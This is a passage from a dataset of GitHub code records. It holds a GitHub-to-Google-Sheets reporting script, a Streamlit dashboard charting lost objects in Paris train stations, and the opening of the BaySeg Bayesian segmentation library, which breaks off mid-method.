"call"}, {"api_name": "copy.copy", "line_number": 158, "usage_type": "call"}, {"api_name": "urllib.parse.unquote", "line_number": 162, "usage_type": "call"}, {"api_name": "re.search", "line_number": 169, "usage_type": "call"}, {"api_name": "re.search", "line_number": 181, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 191, "usage_type": "call"}, {"api_name": "re.search", "line_number": 194, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 202, "usage_type": "call"}, {"api_name": "re.search", "line_number": 205, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 235, "usage_type": "call"}]}
+{"seq_id": "5358260746", "text": "from .github import GitHubApi, GitHubReportSource\n\nimport argparse\nimport yaml\nimport json\nimport os\nimport datetime\nimport pytz\nimport pandas\nimport pygsheets\nimport sys\n\ndef _read_staff_list(sh):\n ret = []\n wks = sh.worksheet_by_title('team_list')\n df = wks.get_as_df()\n headings = ['name', 'git_email', 'github_user', 'slack_username', 'team']\n for index, row in df.iterrows():\n entry = {h: row[h] for h in headings}\n ret.append(entry)\n return ret\n\ndef _get_staff_map(sh, from_field, to_field):\n staff = _read_staff_list(sh)\n ret = {m[from_field]: m[to_field] for m in staff if m[from_field] != ''}\n return pandas.DataFrame(list(ret.items()), columns=[from_field, to_field])\n\ndef git_author_to_team_map(sh):\n return _get_staff_map(sh, 'git_email', 'team')\n\ndef github_user_to_team_map(sh):\n return _get_staff_map(sh, 'github_user', 'team')\n\ndef _get_on_hold_branches(sh):\n wks = sh.worksheet_by_title('on_hold_branches')\n ret = []\n df = wks.get_as_df()\n for index, row in df.iterrows():\n ret.append(row['branch'])\n return ret\n\ndef _validate_google_sheets(sh):\n \"\"\"Throws an exception if missing any sheets.\"\"\"\n for tabname in ['on_hold_branches', 'team_list', 'branches', 'pull_reqs']:\n print(\" {t}\".format(t=tabname))\n wks = sh.worksheet_by_title(tabname)\n\ndef create_report(config, github_creds):\n def get_valid_env_var(name):\n ret = os.environ[name]\n if (ret is None or ret.strip() == ''):\n print(\"Missing {name} env variable\".format(name = name))\n sys.exit()\n return ret\n\n account = github_creds['account_name']\n token = github_creds['github_token']\n github_api = GitHubApi(account, token)\n\n reference_date = datetime.datetime.now()\n toronto = pytz.timezone('America/Toronto')\n reference_date = pytz.utc.localize(reference_date)\n\n print('Start.')\n print('Authorizing google sheets')\n sys.stdout.flush()\n gc = pygsheets.authorize(no_cache=True)\n sheetname = config['google_sheets_filename']\n sh = gc.open(sheetname)\n\n print(\"Validating structure of {sheetname}\".format(sheetname = sheetname))\n _validate_google_sheets(sh)\n\n print('Reading branches to exclude')\n exclude_branches = _get_on_hold_branches(sh)\n\n def dump_dataframe(title, df):\n wks = sh.worksheet_by_title(title)\n wks.clear()\n wks.set_dataframe(df,(1,1))\n\n print('Creating report:')\n sys.stdout.flush()\n report_source = GitHubReportSource(config, github_api, reference_date)\n\n print(' Branches')\n sys.stdout.flush()\n df = report_source.get_branches_dataframe().sort_values(by='last_commit_age', ascending=False)\n df = df[~df.branch.isin(exclude_branches)]\n data = pandas.merge(df, git_author_to_team_map(sh), how='left', left_on=['author'], right_on=['git_email'])\n data.fillna(value='', inplace=True)\n dump_dataframe('branches', data)\n\n print(' Pull requests')\n sys.stdout.flush()\n df = report_source.get_pull_requests_dataframe().sort_values(by='pr_age_days', ascending=False)\n data = pandas.merge(df, github_user_to_team_map(sh), how='left', left_on=['user'], right_on=['github_user'])\n data.fillna(value='', inplace=True)\n dump_dataframe('pull_reqs', data)\n\n print('Done.')\n sys.stdout.flush()\n", "repo_name": "jzohrab/github_google_sheets_report", "sub_path": "GitHubReport/report.py", "file_name": "report.py", "file_ext": "py", "file_size_in_byte": 3331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 53, "usage_type": "call"}, {"api_name": "github.GitHubApi", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 61, "usage_type": "call"}, {"api_name": "pytz.utc.localize", "line_number": 62, "usage_type": "call"}, {"api_name": "pytz.utc", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 66, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygsheets.authorize", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 83, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 83, "usage_type": "attribute"}, {"api_name": "github.GitHubReportSource", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 90, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 97, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 102, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 102, "usage_type": "attribute"}]}
+{"seq_id": "5370680426", "text": "import streamlit as st\nimport pandas as pd\nimport plotly.express as px\nimport sqlite3\nimport numpy as np\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\nmap_token = os.getenv('MAPBOX_TOKEN')\nconnexion = sqlite3.connect(\"db_objets_trouves.db\")\npx.set_mapbox_access_token(map_token)\n\n# Sidebar pour sélectionner l'onglet\nonglet = st.sidebar.selectbox(\"Choisissez un onglet\", [\"Histogramme\", \"Carte objet perdu\", \"Carte frequantation\" ,\"Scatter\",\"saison\",\"saison median\", \"histo bar\"])\n\n# Histogramme ///////////////////////////////////////////////////////////////////////////////////////\nif onglet == \"Histogramme\":\n # affichage du titre\n st.title(\"Histogramme des nombre d'objets perdus par rapport a la date et le type d'objets \")\n\n # lire le fichier CSV dans un DataFrame pandas\n df = pd.read_csv(\"objets-trouves.csv\")\n\n # convertir la colonne \"date\" en type datetime\n df[\"date\"] = pd.to_datetime(df[\"date\"])\n\n # extraire l'année et le mois dans deux colonnes distinctes\n df[\"annee\"] = df[\"date\"].dt.year\n df[\"mois\"] = df[\"date\"].dt.month\n\n # filtrer les données entre 2019 et 2022\n start_date = pd.Timestamp(\"2019-01-01\")\n end_date = pd.Timestamp(\"2022-12-31\")\n df = df[(df[\"date\"] >= start_date) & (df[\"date\"] <= end_date)]\n\n # récupérer les types d'objets uniques\n types_objets = df[\"type d'objet\"].unique()\n\n # Définition de la liste des mois en français\n mois_fr = [\"Tous\", \"Janvier\", \"Février\", \"Mars\", \"Avril\", \"Mai\", \"Juin\", \"Juillet\", \"Août\", \"Septembre\", \"Octobre\", \"Novembre\", \"Décembre\"]\n\n # Définition de la liste des gares\n gares = [\"Tous\", \"Paris Bercy\", \"Paris Saint-Lazare\", \"Paris Gare de Lyon\", \"Paris Gare du Nord\", \"Paris Montparnasse\", \"Paris Est\", \"Paris Austerlitz\"]\n\n # Ajout du sélecteur pour l'année et le mois\n annee = st.selectbox(\"Choisissez une année\", options=range(2019, 2023), index=3) # valeur par défaut : 2022\n mois = st.selectbox(\"Choisissez un mois\", options=mois_fr, index=0) # valeur par défaut : Tous\n\n # Ajout du sélecteur pour la gare\n gare = st.selectbox(\"Choisissez une gare\", options=gares, index=0) # valeur par défaut : Tous\n\n # Ajout du sélecteur pour le type d'objet\n select_type_objet = st.selectbox(\"Choisissez un type d'objet (optionnel)\", options=[\"Tous\"] + list(types_objets))\n if select_type_objet != \"Tous\":\n df = df[df[\"type d'objet\"] == select_type_objet]\n\n # Filtrer les données en fonction de l'année, du mois et de la gare sélectionnés\n if mois == \"Tous\" and gare == \"Tous\":\n filtered_data = df[(df[\"annee\"] == annee)]\n elif mois == \"Tous\":\n filtered_data = df[(df[\"annee\"] == annee) & (df[\"gare\"] == gare)]\n elif gare == \"Tous\":\n filtered_data = df[(df[\"annee\"] == annee) & (df[\"mois\"] == mois_fr.index(mois))]\n else:\n filtered_data = df[(df[\"annee\"] == annee) & (df[\"mois\"] == mois_fr.index(mois)) & (df[\"gare\"] == gare)]\n\n # Affichage du nombre d'objets perdus dans le titre\n # title = f\"Nombre d'objets perdus en {mois} {annee} à la gare {gare}\"\n # if select_type_objet != \"Tous\":\n # title += f\" pour le type d'objet : {select_type_objet}\"\n # title += f\" il y à {len(filtered_data)} objets\"\n # st.title(title)\n\n # Affichage de l'histogramme dans Streamlit\n st.plotly_chart(px.histogram(filtered_data, x=\"date\", nbins=len(filtered_data), \n labels={\"date\": \"Date\", \"count\": \"Nombre d'objets perdus\"}))\n\n\n # Carte ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"Carte objet perdu\":\n st.title(\"Objets trouvés dans les gares par type d'objets \")\n \n \n # Connexion à la base de données SQLite\n connexion = sqlite3.connect(\"db_objets_trouves.db\")\n\n # Ajout d'un selecteur pour l'année\n year = st.selectbox(\"Select a year\", [\"2019\", \"2020\", \"2021\", \"2022\"])\n\n # Récupération des types d'objets disponibles dans la table 'objets_trouves'\n objets_trouves_df = pd.read_sql_query(\"SELECT DISTINCT type_objet FROM objets_trouves\", connexion)\n\n # Création d'une liste des types d'objets à afficher dans le selecteur\n objets_trouves_list = [\"Tous\"] + list(objets_trouves_df['type_objet'].values)\n\n # Ajout d'un selecteur pour le type d'objet requis\n objet_type = st.selectbox(\"Select an object type\", objets_trouves_list)\n\n # Récupération des données de la table 'objets_trouves' pour l'année et le type d'objet sélectionnés\n if objet_type == \"Tous\":\n query = f\"SELECT o.*, g.latitude, g.longitude FROM objets_trouves o JOIN gares_objets_perdus g ON o.gare = g.gare WHERE o.date LIKE '{year}-%'\"\n else:\n query = f\"SELECT o.*, g.latitude, g.longitude FROM objets_trouves o JOIN gares_objets_perdus g ON o.gare = g.gare WHERE o.date LIKE '{year}-%' AND o.type_objet = '{objet_type}'\"\n\n df = pd.read_sql_query(query, connexion)\n\n\n\n # Fermeture de la connexion à la base de données SQLite\n connexion.close()\n\n # Calcul de la somme des objets par type\n df_somme = df.groupby('type_objet')['id'].count().reset_index()\n df_somme = df_somme.rename(columns={'id': 'nombre'})\n\n # Affichage de la somme des objets par type\n st.write(df_somme)\n\n # Configuration de l'accès à l'API de Mapbox\n px.set_mapbox_access_token(map_token)\n\n # Création de la carte\n fig = px.scatter_mapbox(df, lat=\"latitude\", lon=\"longitude\", color=\"id\",\n color_continuous_scale=px.colors.sequential.Reds, size_max=10,\n zoom=10,\n hover_name=\"gare\", hover_data={\"date\": True, \"type_objet\": True, \"id\": True})\n\n\n # Ajout du titre avec l'année sélectionnée\n fig.update_layout(title=f\"Objets trouvés dans les gares en {year}\")\n\n # Configuration des annotations pour la colonne 'frequantation' et 'taux_objets_perdus'\n fig.update_traces(hovertemplate=\"%{hovertext} Date: %{customdata[0]} Type d'objet: %{customdata[1]} Nombre d'objets trouvés: %{customdata[2]}\")\n\n # Affichage de la carte dans Streamlit\n st.plotly_chart(fig)\n \n# Carte ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"Carte frequantation\":\n st.title(\"Carte frequentation dans les gares de Paris \")\n\n # Connexion à la base de données SQLite\n connexion = sqlite3.connect(\"db_objets_trouves.db\")\n\n # Ajout d'un selecteur pour l'année\n year = st.selectbox(\"Select a year\", [\"2019\", \"2020\", \"2021\", \"2022\"])\n\n # Récupération des données de la table 'objet_perdu_annee' pour l'année sélectionnée\n query = f\"SELECT * FROM gares_objets_perdus WHERE annee = {year}\"\n df = pd.read_sql_query(query, connexion)\n\n # Formatage de la colonne 'frequantation' avec des séparateurs de milliers\n df['frequantation'] = df['frequantation'].apply(lambda x: '{:,}'.format(x))\n\n # Fermeture de la connexion à la base de données SQLite\n connexion.close()\n\n # Configuration de l'accès à l'API de Mapbox\n px.set_mapbox_access_token(map_token)\n\n # Création de la carte\n fig = px.scatter_mapbox(df, lat=\"latitude\", lon=\"longitude\", color=\"Nbr_perdu\", size=\"Nbr_perdu\",\n color_continuous_scale=px.colors.cyclical.IceFire, size_max=15,\n center={\"lat\": 48.8566, \"lon\": 2.3522}, zoom=10,\n hover_name=\"gare\", hover_data={\"frequantation\": True, \"Nbr_perdu\": True})\n\n # Ajout du titre avec l'année sélectionnée\n fig.update_layout(title=f\"Objets perdus dans les gares en {year}\")\n\n # Configuration des annotations pour la colonne 'frequantation'\n fig.update_traces(hovertemplate=\"%{hovertext} Frequantation: %{customdata[0]} Objets perdus: %{customdata[1]}\")\n\n # Affichage de la carte dans Streamlit\n st.plotly_chart(fig)\n\n\n# Scatter ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"Scatter\":\n # lire les données de la table \"meteo_objets_trouves\" dans un DataFrame pandas\n df = pd.read_sql_query(\"SELECT date, temperature, nbr_perdu FROM meteo_objets_trouves\", connexion)\n\n # calculer la droite de régression linéaire\n coef = np.polyfit(df[\"temperature\"], df[\"nbr_perdu\"], deg=1)\n poly1d_fn = np.poly1d(coef)\n\n # affichage du titre\n st.title(\"Relation entre la température et le nombre d'objets perdus\")\n\n # affichage du scatterplot avec la droite de régression linéaire\n fig = px.scatter(df, x=\"temperature\", y=\"nbr_perdu\")\n fig.add_scatter(x=df[\"temperature\"], y=poly1d_fn(df[\"temperature\"]), mode=\"lines\", name=\"regression line\")\n st.write(\" Après avoir effectué l'analyse, il n'a pas été trouvé de corrélation significative entre le nombre d'objets perdus et la température. En effet, la droite de régression linéaire obtenue ne montre pas une évolution nette du nombre d'objets perdus en fonction de la température. Ainsi, on peut conclure que la température n'a pas d'impact direct sur le nombre d'objets perdus dans cette étude. \")\n # Affichage de la figure dans Streamlit\n st.plotly_chart(fig)\n \n# saison ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"saison\":\n st.title(\"nombre d'objets perdus par saison\")\n\n # lire les données de la table \"meteo_objets_trouves\" dans un DataFrame pandas\n df = pd.read_sql_query(\"SELECT date, temperature, nbr_perdu FROM meteo_objets_trouves\", connexion)\n\n # convertir la colonne \"date\" en datetime\n df['date'] = pd.to_datetime(df['date'])\n\n # Ajouter une colonne \"saison\" basée sur les mois et les jours\n df['saison'] = pd.cut(df['date'].dt.month + df['date'].dt.day / 100,\n [0, 3.21, 6.21, 9.23, 31.21],\n labels=['hiver', 'printemps', 'été', 'automne'], include_lowest=True)\n\n # Calculer la médiane du nombre d'objets perdus par saison\n mediane_nbr_perdu_par_saison = df.groupby('saison')['nbr_perdu'].median()\n\n \n\n fig = px.histogram(df, x=\"saison\", y=\"nbr_perdu\", color=\"saison\",\n title=\" \")\n fig.update_traces(marker=dict(line=dict(width=0.5, color='DarkSlateGrey')))\n st.plotly_chart(fig)\n \n# saison ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"saison median\":\n # titre de l'application Streamlit\n st.title(\"Distribution du nombre d'objets perdus par saison\")\n\n # lire les données de la table \"meteo_objets_trouves\" dans un DataFrame pandas\n df = pd.read_sql_query(\"SELECT date, temperature, nbr_perdu FROM meteo_objets_trouves\", connexion)\n\n # convertir la colonne \"date\" en datetime\n df['date'] = pd.to_datetime(df['date'])\n\n # Ajouter une colonne \"saison\" basée sur les mois et les jours\n df['saison'] = pd.cut(df['date'].dt.month + df['date'].dt.day / 100,\n [0, 3.21, 6.21, 9.23, 31.21],\n labels=['hiver', 'printemps', 'été', 'automne'], include_lowest=True)\n\n # Ajouter une colonne \"année\" basée sur la colonne \"date\"\n df['année'] = df['date'].dt.year\n\n # Sélectionner les années disponibles dans les données\n années_disponibles = df['année'].unique()\n\n # Sélectionner l'année à afficher à partir d'un sélecteur\n année_selectionnée = st.selectbox('Sélectionner une année', années_disponibles)\n\n # Filtrer les données pour l'année sélectionnée\n df_année_selectionnée = df[df['année'] == année_selectionnée]\n\n # Calculer la médiane du nombre d'objets perdus par saison pour l'année sélectionnée\n mediane_nbr_perdu_par_saison = df_année_selectionnée.groupby('saison')['nbr_perdu'].median()\n\n # Créer un boxplot avec Plotly Express pour l'année sélectionnée\n fig = px.box(df_année_selectionnée, x=\"saison\", y=\"nbr_perdu\", color=\"saison\",\n title=f\"Distribution du nombre d'objets perdus par saison pour l'année {année_selectionnée}\")\n fig.update_traces(marker=dict(line=dict(width=0.5, color='DarkSlateGrey')))\n st.plotly_chart(fig)\n\n# histo bar ///////////////////////////////////////////////////////////////////////////////////////\nelif onglet == \"histo bar\":\n\n # lire le fichier CSV dans un DataFrame pandas\n df = pd.read_csv(\"objets-trouves.csv\")\n\n # convertir la colonne \"date\" en type datetime\n df[\"date\"] = pd.to_datetime(df[\"date\"])\n\n # filtrer les données entre 2019 et 2022\n start_date = pd.Timestamp(\"2019-01-01\")\n end_date = pd.Timestamp(\"2022-12-31\")\n # du lundi au dimanche \n df = df[(df[\"date\"] >= start_date) & (df[\"date\"] <= end_date)]\n\n # renommer la colonne \"type d'objet\" en \"Nbr_perdu\"\n df = df.rename(columns={\"type d'objet\": \"Nbr_perdu\"})\n\n # grouper les données par semaine et calculer la somme du nombre d'objets pour chaque semaine\n weekly_sum = df.groupby(pd.Grouper(key=\"date\", freq=\"w\"))[\"Nbr_perdu\"].count().reset_index()\n\n # créer la figure avec Plotly\n fig = px.histogram(df, x=\"date\", nbins=len(weekly_sum), color=\"Nbr_perdu\",\n color_discrete_sequence=px.colors.qualitative.Plotly)\n fig.update_layout(xaxis_title=\"Date (Semaine)\", yaxis_title=\"Nombre d'objets perdus\")\n\n # afficher la figure\n st.plotly_chart(fig)", "repo_name": "RolaMmss/Lost-in-translation", "sub_path": "stream_all.py", "file_name": "stream_all.py", "file_ext": "py", "file_size_in_byte": 13352, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 11, "usage_type": "call"}, {"api_name": "plotly.express.set_mapbox_access_token", "line_number": 12, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 12, "usage_type": "name"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 15, "usage_type": "attribute"}, {"api_name": "streamlit.title", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 34, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 47, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 48, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 51, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 54, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 76, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 76, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 76, "usage_type": "name"}, {"api_name": "streamlit.title", "line_number": 82, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 86, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 92, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 106, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 118, "usage_type": "call"}, {"api_name": "plotly.express.set_mapbox_access_token", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 121, "usage_type": "name"}, {"api_name": "plotly.express.scatter_mapbox", "line_number": 124, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 124, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 125, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 125, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 137, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 141, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 144, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 147, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 151, "usage_type": "call"}, {"api_name": "plotly.express.set_mapbox_access_token", "line_number": 160, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 160, "usage_type": "name"}, {"api_name": "plotly.express.scatter_mapbox", "line_number": 163, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 163, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 164, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 164, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.poly1d", "line_number": 185, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 188, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 191, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 191, "usage_type": "name"}, {"api_name": "streamlit.write", "line_number": 193, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 195, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 199, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 202, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 208, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 217, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 217, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 220, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 225, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 228, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 231, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 234, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 245, "usage_type": "call"}, {"api_name": "plotly.express.box", "line_number": 254, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 254, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 257, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 263, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 266, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 269, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 270, "usage_type": "call"}, {"api_name": "pandas.Grouper", "line_number": 278, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 281, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 281, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 282, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 282, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 286, "usage_type": "call"}]}
+{"seq_id": "25516676893", "text": "\"\"\"\nBaySeg is a Python library for unsupervised clustering of n-dimensional data sets, designed for the segmentation of\none-, two- and three-dimensional data in the field of geological modeling and geophysics. The library is based on the\nalgorithm developed by Wang et al., 2017 and combines Hidden Markov Random Fields with Gaussian Mixture Models in a\nBayesian inference framework.\n\n************************************************************************************************\nReferences\n\n[1] Wang, H., Wellmann, J. F., Li, Z., Wang, X., & Liang, R. Y. (2017). A Segmentation Approach for Stochastic\n Geological Modeling Using Hidden Markov Random Fields. Mathematical Geosciences, 49(2), 145-177.\n\n************************************************************************************************\n@authors: Alexander Schaaf, Hui Wang, Florian Wellmann\n************************************************************************************************\nBaySeg is licensed under the GNU Lesser General Public License v3.0\n************************************************************************************************\n\"\"\"\n\nimport numpy as np # scientific computing library\nfrom sklearn import mixture # gaussian mixture model\nfrom scipy.stats import multivariate_normal, norm # normal distributions\nfrom copy import copy\nfrom itertools import combinations\nimport tqdm # smart-ish progress bar\nimport matplotlib.pyplot as plt # 2d plotting\nfrom matplotlib import gridspec, rcParams # plot arrangements\nfrom .colors import cmap, cmap_norm # custom colormap\nfrom .ie import *\nimport pandas as pd\nfrom statistics import mode\nimport heapq as hq\n\nimport sys\nsys.path.append(\"C:/Users/Tobias Giesgen/PycharmProjects/gempy\")\nimport gempy as gp\n\nplt.style.use('bmh') # plot style\n\n\nclass BaySeg:\n def __init__(self, data, n_labels, raw_data, feature_names, boreholes, gp_resolution, beta_init=1, inc_gempy = False,\n stencil=None, normalize=True, plot=False):\n \"\"\"\n\n Args:\n data (:obj:`np.ndarray`): Multidimensional data array containing all observations (features) in the\n following format:\n\n 1D = (Y, F)\n 2D = (Y, X, F)\n 3D = (Y, X, Z, F)\n\n n_labels (int): Number of labels representing the number of clusters to be segmented.\n beta_init (float): Initial penalty value for Gibbs energy calculation.\n stencil (int): Number specifying the stencil of the neighborhood system used in the Gibbs energy\n calculation.\n\n \"\"\"\n # TODO: [DOCS] Main object description\n\n # store initial data\n self.data = data\n # get shape for physical and feature dimensions\n self.shape = np.shape(data)\n self.phys_shp = np.array(self.shape[:-1])\n\n self.inc_gempy = inc_gempy\n\n # get number of features\n self.n_feat = self.shape[-1]\n\n # gempy properties\n self.gp_resolution = gp_resolution\n\n # GRAPH COLORING\n self.stencil = stencil\n self.colors = pseudocolor(self.shape, self.stencil)\n\n # ************************************************************************************************\n # fetch dimensionality, coordinate and feature vector from input data\n\n # 1D\n if len(self.shape) == 2:\n # 1d case\n self.dim = 1\n # create coordinate vector\n # self.coords = np.array([np.arange(self.shape[0])]).T\n # feature vector\n self.feat = self.data\n\n\n # 2D\n elif len(self.shape) == 3:\n # 2d case\n self.dim = 2\n # create coordinate vector\n # y, x = np.indices(self.shape[:-1])\n # print(y, x)\n # self.coords = np.array([y.flatten(), x.flatten()]).T\n\n # feature vector\n self.feat = np.array([self.data[:, :, f].ravel() for f in range(self.n_feat)]).T\n\n # 3D\n elif len(self.shape) == 4:\n # 3d case\n raise Exception(\"3D segmentation not yet supported.\")\n\n # mismatch\n else:\n raise Exception(\"Data format appears to be wrong (neither 1-, 2- or 3-D).\")\n\n if normalize:\n self.normalize_feature_vectors()\n\n # ************************************************************************************************\n # INIT STORAGE ARRAYS\n\n # self.betas = [beta_init] # initial beta\n # self.mus = np.array([], dtype=object)\n # self.covs = np.array([], dtype=object)\n # self.labels = np.array([], dtype=object)\n\n # ************************************************************************************************\n # INIT GAUSSIAN MIXTURE MODEL\n self.n_labels = n_labels\n self.gmm = mixture.GaussianMixture(n_components=n_labels, covariance_type=\"full\")\n self.gmm.fit(self.feat)\n # do initial prediction based on fit and observations, store as first entry in labels\n\n # ************************************************************************************************\n # INIT LABELS, MU and COV based on GMM\n # TODO: [GENERAL] storage variables from lists to numpy ndarrays\n self.labels = [self.gmm.predict(self.feat)]\n # INIT MU (mean from initial GMM)\n self.mus = [self.gmm.means_]\n # INIT COV (covariances from initial GMM)\n self.covs = [self.gmm.covariances_]\n\n self.labels_probability = []\n self.storage_gibbs_e = []\n self.storage_like_e = []\n self.storage_te = []\n self.storage_gempy_e = []\n\n self.beta_acc_ratio = np.array([])\n self.beta_gp_acc_ratio = np.array([])\n self.cov_acc_ratio = np.array([])\n self.mu_acc_ratio = np.array([])\n\n # ************************************************************************************************\n # Initialize PRIOR distributions for beta, mu and covariance\n # BETA\n if self.dim == 1:\n self.prior_beta = norm(beta_init, np.eye(1) * 100)\n self.betas = [beta_init]\n elif self.dim == 2:\n if self.stencil == \"4p\":\n beta_dim = 2\n elif self.stencil == \"8p\" or self.stencil is None:\n beta_dim = 4\n\n self.betas = [[beta_init for i in range(beta_dim)]]\n self.prior_beta = multivariate_normal([beta_init for i in range(beta_dim)], np.eye(beta_dim) * 100)\n\n elif self.dim == 3:\n raise Exception(\"3D not yet supported.\")\n\n if inc_gempy == True:\n if self.stencil == \"4p\":\n beta_dim2 = 2\n elif self.stencil == \"8p\" or self.stencil is None:\n beta_dim2 = 4\n self.betas_gp = [[beta_init for i in range(beta_dim2)]]\n self.prior_beta_gp = multivariate_normal([beta_init for i in range(beta_dim2)], np.eye(beta_dim2) * 100)\n else:pass\n\n # MU\n # generate distribution means for each label\n prior_mu_means = [self.mus[0][label] for label in range(self.n_labels)]\n # generate distribution covariances for each label\n prior_mu_stds = [np.eye(self.n_feat) * 100 for label in range(self.n_labels)]\n # use the above to generate multivariate normal distributions for each label\n self.priors_mu = [multivariate_normal(prior_mu_means[label], prior_mu_stds[label]) for label in\n range(self.n_labels)]\n\n # COV\n # generate b_sigma\n self.b_sigma = np.zeros((self.n_labels, self.n_feat))\n for l in range(self.n_labels):\n self.b_sigma[l, :] = np.log(np.sqrt(np.diag(self.gmm.covariances_[l, :, :])))\n # generate kesi\n self.kesi = np.ones((self.n_labels, self.n_feat)) * 100\n # generate nu\n self.nu = self.n_feat + 1\n # *************************************************************************************************\n '''Create Gempy model from initial data'''\n self.boreholes = boreholes\n self.raw_data = raw_data\n self.feature_names = feature_names\n self.n_boreholes = len(boreholes)\n\n def create_gempy(self, labels, raw_data, labels_prob, plot):\n print('Gempy model under construction:')\n \"\"\"\n Creates a gempy model with the labels taken from the initial Gaussian Mixture model\n\n Args:\n labels: labeling (vector containing values corresponding to a label)\n 